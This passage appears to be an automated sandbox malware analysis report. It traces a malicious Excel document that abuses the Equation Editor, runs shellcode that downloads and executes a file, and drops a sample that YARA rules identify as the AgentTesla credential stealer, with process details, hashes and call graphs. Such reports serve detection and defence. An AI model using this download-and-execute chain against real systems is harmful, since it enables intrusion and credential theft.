                          Data Ascii: M^`uM=EPMW}WhDHvYYWhHaYY%WhHLYY,WhH7YYu;aRLEPMERLPOGEPM=RL-MYNQjSWe3u@EjPE


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:08:20:00
                          Start date:10/12/2024
                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                          Imagebase:0x13fee0000
                          File size:28'253'536 bytes
                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:2
                          Start time:08:20:48
                          Start date:10/12/2024
                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                          Imagebase:0x400000
                          File size:543'304 bytes
                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:08:20:54
                          Start date:10/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          Imagebase:0xd40000
                          File size:1'051'136 bytes
                          MD5 hash:EF05B0557B2C8F0C951A1B21B812E75F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:6
                          Start time:08:20:55
                          Start date:10/12/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          Imagebase:0x11a0000
                          File size:45'248 bytes
                          MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.635675466.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate
                          Has exited:false

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:16.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:67.3%
                            Total number of Nodes:107
                            Total number of Limit Nodes:3
                            execution_graph 514 3560567 GetPEB 515 3560575 514->515 516 3560465 517 3560467 516->517 530 356047a LoadLibraryW 517->530 519 356046c 521 3560481 519->521 541 3560494 519->541 551 35604f5 URLDownloadToFileW 521->551 523 35604a5 URLDownloadToFileW 557 3560512 523->557 531 3560494 5 API calls 530->531 532 3560481 531->532 533 35604f5 4 API calls 532->533 534 35604a5 URLDownloadToFileW 533->534 536 3560512 3 API calls 534->536 537 35604fe 536->537 538 3560575 537->538 561 3560540 537->561 538->519 542 3560497 541->542 543 35604f5 4 API calls 542->543 544 35604a5 URLDownloadToFileW 543->544 546 3560512 3 API calls 544->546 547 35604fe 546->547 548 3560575 547->548 549 3560540 3 API calls 547->549 548->521 550 3560538 549->550 552 35604fe 551->552 553 3560512 3 API calls 551->553 554 3560575 552->554 555 3560540 3 API calls 552->555 553->552 554->523 556 3560538 555->556 558 3560515 557->558 559 3560540 3 API calls 558->559 560 3560538 559->560 562 3560543 WinExec 561->562 567 3560560 562->567 564 3560554 565 3560563 ExitProcess 564->565 566 3560538 564->566 568 3560563 ExitProcess 567->568 569 35603cf ExitProcess 584 35603e8 569->584 571 3560494 5 API calls 572 3560481 571->572 573 35604f5 4 API calls 572->573 577 35604a5 URLDownloadToFileW 573->577 574 35603db 574->572 576 356043d 574->576 600 3560465 574->600 576->571 576->572 579 3560512 3 API calls 577->579 580 35604fe 579->580 581 3560575 580->581 582 3560540 3 API calls 580->582 583 3560538 582->583 585 35603ee 584->585 614 3560404 585->614 587 356043d 588 3560494 5 API calls 587->588 589 3560481 587->589 588->589 590 35604f5 4 API calls 589->590 593 35604a5 URLDownloadToFileW 590->593 591 35603f5 591->587 591->589 592 3560465 8 API calls 591->592 592->587 595 3560512 3 API calls 593->595 596 35604fe 595->596 597 3560575 596->597 598 3560540 3 API calls 596->598 597->574 599 3560538 598->599 601 3560467 600->601 602 356047a 7 API calls 601->602 603 356046c 602->603 604 3560494 5 API calls 603->604 605 3560481 603->605 604->605 606 35604f5 4 API calls 605->606 607 35604a5 URLDownloadToFileW 606->607 609 3560512 3 API calls 607->609 610 35604fe 609->610 611 3560575 610->611 612 3560540 3 API calls 610->612 611->576 613 3560538 612->613 615 356040a 614->615 630 356042b 615->630 617 3560481 618 35604f5 4 API calls 617->618 622 35604a5 URLDownloadToFileW 618->622 619 3560494 5 API calls 619->617 620 3560411 620->617 621 3560465 8 API calls 620->621 623 356043d 620->623 621->623 625 3560512 3 API calls 622->625 623->617 623->619 626 35604fe 625->626 627 3560575 626->627 628 3560540 3 API calls 626->628 627->591 629 3560538 628->629 631 356042e 630->631 632 3560465 8 API calls 631->632 633 356043d 632->633 634 3560494 5 API calls 633->634 635 3560481 633->635 634->635 636 35604f5 4 API calls 635->636 637 35604a5 URLDownloadToFileW 636->637 639 3560512 3 API calls 637->639 640 35604fe 639->640 641 3560575 640->641 642 3560540 3 API calls 640->642 641->620 643 3560538 642->643

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_03560157 1 Function_03560494 3 Function_035604F5 1->3 4 Function_03560512 1->4 12 Function_03560540 1->12 16 Function_0356058F 1->16 2 Function_03560055 3->4 3->12 3->16 4->12 5 Function_03560210 6 Function_035601FF 7 Function_0356029D 8 Function_0356047A 8->1 8->3 8->4 8->12 8->16 9 Function_03560567 9->16 10 Function_03560404 10->1 10->3 10->4 11 Function_03560465 10->11 10->12 14 Function_035605E0 10->14 10->16 17 Function_0356042B 10->17 11->1 11->3 11->4 11->8 11->12 11->16 13 Function_03560560 12->13 15 Function_035603CF 15->1 15->3 15->4 15->11 15->12 15->16 18 Function_035603E8 15->18 17->1 17->3 17->4 17->11 17->12 17->16 18->1 18->3 18->4 18->10 18->11 18->12 18->14 18->16 19 Function_03560328 20 Function_03560029

                            Executed Functions

                            Function 0356047A Relevance: 3.1, APIs: 2, Instructions: 82libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 356047a-35604f9 LoadLibraryW call 3560494 call 35604f5 URLDownloadToFileW call 3560512 16 35604fe-3560509 0->16 17 3560577-356057c 16->17 18 356050b 16->18 21 35605a2-35605a6 17->21 22 356057e-3560582 call 356058f 17->22 19 3560576 18->19 20 356050d-356050e 18->20 19->17 23 3560584-3560586 20->23 24 3560510-3560539 call 3560540 20->24 26 35605a9 21->26 22->23 28 3560575 23->28 29 3560588-356058c 23->29 30 35605b1-35605b5 26->30 31 35605ab-35605af 26->31 28->17 34 35605b7-35605bb 30->34 35 35605ca-35605cc 30->35 31->30 33 35605bd-35605c4 31->33 36 35605c6 33->36 37 35605c8 33->37 34->33 34->35 38 35605dc-35605dd 35->38 36->35 37->35 41 35605ce-35605d7 37->41 41->38 42 356059b-356059e 41->42 43 35605a0-35605a3 42->43 44 35605d9 42->44 43->41 45 35605a5 43->45 44->38 45->26
                            APIs
                            • LoadLibraryW.KERNEL32(0356046C), ref: 0356047A
                              • Part of subcall function 03560494: URLDownloadToFileW.URLMON(00000000,035604A5,?,00000000,00000000), ref: 035604F7
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFileLibraryLoad
                            • String ID:
                            • API String ID: 2776762486-0
                            • Opcode ID: 22eebc276f5b49a441160e739c2ab75f2086f15045b57c62eeaf238410b76855
                            • Instruction ID: 27cb517ab8996e8f5de363ae60fc193250408ff02c67f8f0c073a0f2bf8afe60
                            • Opcode Fuzzy Hash: 22eebc276f5b49a441160e739c2ab75f2086f15045b57c62eeaf238410b76855
                            • Instruction Fuzzy Hash: B321C4A144C7C22FC722D670AD7AB65BF247BA3610F1CC6CE95D50F1E3A35492059752
                            Function 03560540 Relevance: 3.0, APIs: 2, Instructions: 46processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 46 3560540-3560557 WinExec call 3560560 51 35605a9 46->51 52 3560559 46->52 55 35605b1-35605b5 51->55 56 35605ab-35605af 51->56 53 35605ca-35605cc 52->53 54 356055b-3560565 ExitProcess 52->54 57 35605dc-35605dd 53->57 55->53 60 35605b7-35605bb 55->60 56->55 59 35605bd-35605c4 56->59 61 35605c6 59->61 62 35605c8 59->62 60->53 60->59 61->53 62->53 63 35605ce-35605d7 62->63 63->57 65 356059b-356059e 63->65 66 35605a0-35605a3 65->66 67 35605d9 65->67 66->63 68 35605a5 66->68 67->57 68->51
                            APIs
                            • WinExec.KERNEL32(?,00000001), ref: 0356054D
                              • Part of subcall function 03560560: ExitProcess.KERNELBASE(00000000), ref: 03560565
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: ExecExitProcess
                            • String ID:
                            • API String ID: 4112423671-0
                            • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                            • Instruction ID: 31d79f1c1dd14c0a3c547983067fb985165132ad556052ee14b35d3e46f68851
                            • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                            • Instruction Fuzzy Hash: A6F0D1D990E34221DA30F628E8757A6AF51BB71320FCC884BA882070F5E56891C38619
                            Function 035603E8 Relevance: 1.6, APIs: 1, Instructions: 149filenetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 35603e8-35603fe call 35605e0 call 3560404 76 3560466-3560475 69->76 77 3560401 69->77 79 3560476-356047b 76->79 77->79 80 3560403-3560412 77->80 81 3560481-3560483 79->81 82 356047c call 3560494 79->82 83 3560484-356048f 80->83 84 3560414-3560419 80->84 81->83 82->81 88 3560497-3560509 call 35604f5 URLDownloadToFileW call 3560512 83->88 84->83 85 356041b-3560421 84->85 85->79 90 3560423 85->90 109 3560577-356057c 88->109 110 356050b 88->110 90->88 92 3560425-3560464 call 3560465 90->92 92->76 113 35605a2-35605a6 109->113 114 356057e-3560582 call 356058f 109->114 111 3560576 110->111 112 356050d-356050e 110->112 111->109 115 3560584-3560586 112->115 116 3560510-3560539 call 3560540 112->116 118 35605a9 113->118 114->115 120 3560575 115->120 121 3560588-356058c 115->121 122 35605b1-35605b5 118->122 123 35605ab-35605af 118->123 120->109 126 35605b7-35605bb 122->126 127 35605ca-35605cc 122->127 123->122 125 35605bd-35605c4 123->125 128 35605c6 125->128 129 35605c8 125->129 126->125 126->127 130 35605dc-35605dd 127->130 128->127 129->127 133 35605ce-35605d7 129->133 133->130 134 356059b-356059e 133->134 135 35605a0-35605a3 134->135 136 35605d9 134->136 135->133 137 35605a5 135->137 136->130 137->118
                            APIs
                            • URLDownloadToFileW.URLMON(00000000,035604A5,?,00000000,00000000), ref: 035604F7
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: 349008c7f50ef8f21d6367dce86b465c53a3ccc32d360f951f42ba3ef2c074d6
                            • Instruction ID: a9874500c8d652537cd5917fc767dc634c899d52b04dc0a0579cdb1309653207
                            • Opcode Fuzzy Hash: 349008c7f50ef8f21d6367dce86b465c53a3ccc32d360f951f42ba3ef2c074d6
                            • Instruction Fuzzy Hash: D441BBA144D3C62FC722D770AD6A666BF247A93111F0CCACFD5D50B1F3E3A4A6069352
                            Function 03560404 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 138 3560404-3560412 call 35605e0 call 356042b 143 3560484-356048f 138->143 144 3560414-3560419 138->144 148 3560497-3560509 call 35604f5 URLDownloadToFileW call 3560512 143->148 144->143 145 356041b-3560421 144->145 150 3560476-356047b 145->150 151 3560423 145->151 174 3560577-356057c 148->174 175 356050b 148->175 153 3560481-3560483 150->153 154 356047c call 3560494 150->154 151->148 155 3560425-3560475 call 3560465 151->155 153->143 154->153 155->150 178 35605a2-35605a6 174->178 179 356057e-3560582 call 356058f 174->179 176 3560576 175->176 177 356050d-356050e 175->177 176->174 180 3560584-3560586 177->180 181 3560510-3560539 call 3560540 177->181 183 35605a9 178->183 179->180 185 3560575 180->185 186 3560588-356058c 180->186 187 35605b1-35605b5 183->187 188 35605ab-35605af 183->188 185->174 191 35605b7-35605bb 187->191 192 35605ca-35605cc 187->192 188->187 190 35605bd-35605c4 188->190 193 35605c6 190->193 194 35605c8 190->194 191->190 191->192 195 35605dc-35605dd 192->195 193->192 194->192 198 35605ce-35605d7 194->198 198->195 199 356059b-356059e 198->199 200 35605a0-35605a3 199->200 201 35605d9 199->201 200->198 202 35605a5 200->202 201->195 202->183
                            APIs
                            • URLDownloadToFileW.URLMON(00000000,035604A5,?,00000000,00000000), ref: 035604F7
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: 2a29999f516f4265654bf4ba96437bc394bd20367927042e726513b9c637b6c0
                            • Instruction ID: 0e2f49ce4a7edaf3ac9460c6d96e845b4d17d5dbf6a0ff0ab8972b6a493411f4
                            • Opcode Fuzzy Hash: 2a29999f516f4265654bf4ba96437bc394bd20367927042e726513b9c637b6c0
                            • Instruction Fuzzy Hash: 7341AEA544D3C62FC722D770AD2A665BF247B93511F0CCA8E95D50B1F3A3A4A2059352
                            Function 03560494 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 203 3560494-35604f9 call 35604f5 URLDownloadToFileW call 3560512 215 35604fe-3560509 203->215 216 3560577-356057c 215->216 217 356050b 215->217 220 35605a2-35605a6 216->220 221 356057e-3560582 call 356058f 216->221 218 3560576 217->218 219 356050d-356050e 217->219 218->216 222 3560584-3560586 219->222 223 3560510-3560539 call 3560540 219->223 225 35605a9 220->225 221->222 227 3560575 222->227 228 3560588-356058c 222->228 229 35605b1-35605b5 225->229 230 35605ab-35605af 225->230 227->216 233 35605b7-35605bb 229->233 234 35605ca-35605cc 229->234 230->229 232 35605bd-35605c4 230->232 235 35605c6 232->235 236 35605c8 232->236 233->232 233->234 237 35605dc-35605dd 234->237 235->234 236->234 240 35605ce-35605d7 236->240 240->237 241 356059b-356059e 240->241 242 35605a0-35605a3 241->242 243 35605d9 241->243 242->240 244 35605a5 242->244 243->237 244->225
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: be88e611c56496e43933ae3405814ab347067055421826d976b01dd4bed9f06f
                            • Instruction ID: e20f3774e0318cf870b816079b27584707fbd10fe5328dbe51ba67a77370921a
                            • Opcode Fuzzy Hash: be88e611c56496e43933ae3405814ab347067055421826d976b01dd4bed9f06f
                            • Instruction Fuzzy Hash: 4311AFA084C3C22FC722D770AC6AB55BF647BA2610F1CCACE96D50F1E3E3A591019752
                            Function 035604F5 Relevance: 1.6, APIs: 1, Instructions: 58filenetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 245 35604f5-35604f7 URLDownloadToFileW 246 35604fe-3560509 245->246 247 35604f9 call 3560512 245->247 248 3560577-356057c 246->248 249 356050b 246->249 247->246 252 35605a2-35605a6 248->252 253 356057e-3560582 call 356058f 248->253 250 3560576 249->250 251 356050d-356050e 249->251 250->248 254 3560584-3560586 251->254 255 3560510-3560539 call 3560540 251->255 257 35605a9 252->257 253->254 259 3560575 254->259 260 3560588-356058c 254->260 261 35605b1-35605b5 257->261 262 35605ab-35605af 257->262 259->248 265 35605b7-35605bb 261->265 266 35605ca-35605cc 261->266 262->261 264 35605bd-35605c4 262->264 267 35605c6 264->267 268 35605c8 264->268 265->264 265->266 269 35605dc-35605dd 266->269 267->266 268->266 272 35605ce-35605d7 268->272 272->269 273 356059b-356059e 272->273 274 35605a0-35605a3 273->274 275 35605d9 273->275 274->272 276 35605a5 274->276 275->269 276->257
                            APIs
                            • URLDownloadToFileW.URLMON(00000000,035604A5,?,00000000,00000000), ref: 035604F7
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                            • Instruction ID: 5279f4de2a71d999a372d26c535c100bfb53933d33cc84a54f8962db0a974139
                            • Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                            • Instruction Fuzzy Hash: 94116FF090D3427AC760E654E871BBAFBA1BBF2720F58C55AE5504F0F5E3A0E542C219
                            Function 03560560 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 277 3560560-3560565 ExitProcess
                            APIs
                            • ExitProcess.KERNELBASE(00000000), ref: 03560565
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                            • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                            • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                            • Instruction Fuzzy Hash:
                            Function 03560567 Relevance: .0, Instructions: 14COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 279 3560567-3560572 GetPEB 280 3560575-356057c 279->280 282 35605a2-35605a6 280->282 283 356057e-3560586 call 356058f 280->283 285 35605a9 282->285 283->280 296 3560588-356058c 283->296 287 35605b1-35605b5 285->287 288 35605ab-35605af 285->288 291 35605b7-35605bb 287->291 292 35605ca-35605cc 287->292 288->287 290 35605bd-35605c4 288->290 293 35605c6 290->293 294 35605c8 290->294 291->290 291->292 295 35605dc-35605dd 292->295 293->292 294->292 297 35605ce-35605d7 294->297 297->295 298 356059b-356059e 297->298 299 35605a0-35605a3 298->299 300 35605d9 298->300 299->297 301 35605a5 299->301 300->295 301->285
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                            • Instruction ID: 3b71189967319153c3b7bd3ba86c2be8051481b30d5539eb49684a3b622bbc97
                            • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                            • Instruction Fuzzy Hash: 5DD052B12025029FC304DF04D990E22F37AFFE8260B28C268E4044B769D730E892CB90

                            Non-executed Functions

                            Function 035603CF Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 302 35603cf-35603fe ExitProcess call 35603e8 307 3560466-3560475 302->307 308 3560401 302->308 310 3560476-356047b 307->310 308->310 311 3560403-3560412 308->311 312 3560481-3560483 310->312 313 356047c call 3560494 310->313 314 3560484-356048f 311->314 315 3560414-3560419 311->315 312->314 313->312 319 3560497-3560509 call 35604f5 URLDownloadToFileW call 3560512 314->319 315->314 316 356041b-3560421 315->316 316->310 321 3560423 316->321 340 3560577-356057c 319->340 341 356050b 319->341 321->319 323 3560425-3560464 call 3560465 321->323 323->307 344 35605a2-35605a6 340->344 345 356057e-3560582 call 356058f 340->345 342 3560576 341->342 343 356050d-356050e 341->343 342->340 346 3560584-3560586 343->346 347 3560510-3560539 call 3560540 343->347 349 35605a9 344->349 345->346 351 3560575 346->351 352 3560588-356058c 346->352 353 35605b1-35605b5 349->353 354 35605ab-35605af 349->354 351->340 357 35605b7-35605bb 353->357 358 35605ca-35605cc 353->358 354->353 356 35605bd-35605c4 354->356 359 35605c6 356->359 360 35605c8 356->360 357->356 357->358 361 35605dc-35605dd 358->361 359->358 360->358 364 35605ce-35605d7 360->364 364->361 365 356059b-356059e 364->365 366 35605a0-35605a3 365->366 367 35605d9 365->367 366->364 368 35605a5 366->368 367->361 368->349
                            APIs
                            • ExitProcess.KERNELBASE(035603BD), ref: 035603CF
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: bedebe269a70294558d653869ad26599dbae31bf343a58e7048c1f80490712e0
                            • Instruction ID: bb633ee72060a364036828a052251c305007c987ed68d66fa78e9a0baf4b1980
                            • Opcode Fuzzy Hash: bedebe269a70294558d653869ad26599dbae31bf343a58e7048c1f80490712e0
                            • Instruction Fuzzy Hash: 0A11005580E7C55FC322D7706E6A065BF60B95310270D8ACFC0C50B1F3E2A8D646D352

                            Execution Graph

                            Execution Coverage:3.8%
                            Dynamic/Decrypted Code Coverage:0.4%
                            Signature Coverage:6.2%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:184
                            execution_graph 104317 d67c56 104318 d67c62 __write 104317->104318 104354 d69e08 GetStartupInfoW 104318->104354 104320 d67c67 104356 d68b7c GetProcessHeap 104320->104356 104322 d67cbf 104323 d67cca 104322->104323 104439 d67da6 59 API calls 3 library calls 104322->104439 104357 d69ae6 104323->104357 104326 d67cd0 104327 d67cdb __RTC_Initialize 104326->104327 104440 d67da6 59 API calls 3 library calls 104326->104440 104378 d6d5d2 104327->104378 104330 d67cf6 GetCommandLineW 104397 d74f23 GetEnvironmentStringsW 104330->104397 104331 d67cea 104331->104330 104441 d67da6 59 API calls 3 library calls 104331->104441 104334 d67cf5 104334->104330 104337 d67d10 104338 d67d1b 104337->104338 104442 d630b5 59 API calls 3 library calls 104337->104442 104407 d74d58 104338->104407 104341 d67d21 104342 d67d2c 104341->104342 104443 d630b5 59 API calls 3 library calls 104341->104443 104421 d630ef 104342->104421 104345 d67d34 104346 d67d3f __wwincmdln 104345->104346 104444 d630b5 59 API calls 3 library calls 104345->104444 104427 d447d0 104346->104427 104349 d67d53 104350 d67d62 104349->104350 104445 d63358 59 API calls _doexit 104349->104445 104446 d630e0 59 API calls _doexit 104350->104446 104353 d67d67 __write 104355 d69e1e 104354->104355 104355->104320 104356->104322 104447 d63187 RtlEncodePointer 104357->104447 104359 d69aeb 104453 d69d3c 104359->104453 104362 d69af4 104457 d69b5c 62 API calls 2 library calls 104362->104457 104365 d69af9 104365->104326 104366 d69b06 104366->104362 104367 d69b11 104366->104367 104459 d687d5 104367->104459 104369 d69b1e 104370 d69b53 104369->104370 104465 d69de6 TlsSetValue 104369->104465 104467 d69b5c 62 API calls 2 library calls 104370->104467 104373 d69b58 104373->104326 104374 d69b32 104374->104370 104375 d69b38 104374->104375 104466 d69a33 59 API calls 4 library calls 104375->104466 104377 d69b40 GetCurrentThreadId 104377->104326 104379 d6d5de __write 104378->104379 104484 d69c0b 104379->104484 104381 d6d5e5 104382 d687d5 __calloc_crt 59 API calls 104381->104382 104383 d6d5f6 104382->104383 104384 d6d661 GetStartupInfoW 104383->104384 104385 d6d601 __write @_EH4_CallFilterFunc@8 104383->104385 104386 d6d676 104384->104386 104387 d6d7a5 104384->104387 104385->104331 104386->104387 104390 d687d5 __calloc_crt 59 API calls 104386->104390 104393 d6d6c4 104386->104393 104388 d6d86d 104387->104388 104391 d6d7f2 GetStdHandle 104387->104391 104392 d6d805 GetFileType 104387->104392 104396 d69e2b __mtinitlocks 2 API calls 104387->104396 104491 d6d87d LeaveCriticalSection _doexit 104388->104491 104390->104386 104391->104387 104392->104387 104393->104387 104394 d6d6f8 GetFileType 104393->104394 104395 d69e2b __mtinitlocks 2 API calls 104393->104395 104394->104393 104395->104393 104396->104387 104398 d74f34 104397->104398 104399 d67d06 104397->104399 104530 d6881d 59 API calls __malloc_crt 104398->104530 104403 d74b1b GetModuleFileNameW 104399->104403 104401 d74f5a _memmove 104402 d74f70 FreeEnvironmentStringsW 104401->104402 104402->104399 104404 d74b4f _wparse_cmdline 104403->104404 104406 d74b8f _wparse_cmdline 104404->104406 104531 d6881d 59 API calls __malloc_crt 104404->104531 104406->104337 104408 d74d71 __wsetenvp 104407->104408 104412 d74d69 104407->104412 104409 d687d5 __calloc_crt 59 API calls 104408->104409 104417 d74d9a __wsetenvp 104409->104417 104410 d74df1 104411 d62d55 _free 59 API calls 104410->104411 104411->104412 104412->104341 104413 d687d5 __calloc_crt 59 API calls 104413->104417 104414 d74e16 104415 d62d55 _free 59 API calls 104414->104415 104415->104412 104417->104410 104417->104412 104417->104413 104417->104414 104418 d74e2d 104417->104418 104532 d74607 59 API calls ___wstrgtold12_l 104417->104532 104533 d68dc6 IsProcessorFeaturePresent 104418->104533 104420 d74e39 104420->104341 104422 d630fb __IsNonwritableInCurrentImage 104421->104422 104556 d6a4d1 104422->104556 104424 d63119 __initterm_e 104426 d63138 _doexit __IsNonwritableInCurrentImage 104424->104426 104559 d62d40 104424->104559 104426->104345 104428 d447ea 104427->104428 104438 d44889 104427->104438 104429 d44824 IsThemeActive 104428->104429 104594 d6336c 104429->104594 104433 d44850 104606 d448fd SystemParametersInfoW SystemParametersInfoW 104433->104606 104435 d4485c 104607 d43b3a 104435->104607 104437 d44864 SystemParametersInfoW 104437->104438 104438->104349 104439->104323 104440->104327 104441->104334 104445->104350 104446->104353 104468 d633c7 104447->104468 104449 d63198 __init_pointers __initp_misc_winsig 104469 d6a524 EncodePointer 104449->104469 104451 d631b0 __init_pointers 104452 d69e99 34 API calls 104451->104452 104452->104359 104454 d69d48 104453->104454 104456 d69af0 104454->104456 104470 d69e2b 104454->104470 104456->104362 104458 d69d8a TlsAlloc 104456->104458 104457->104365 104458->104366 104462 d687dc 104459->104462 104461 d68817 104461->104369 104462->104461 104464 d687fa 104462->104464 104473 d751f6 104462->104473 104464->104461 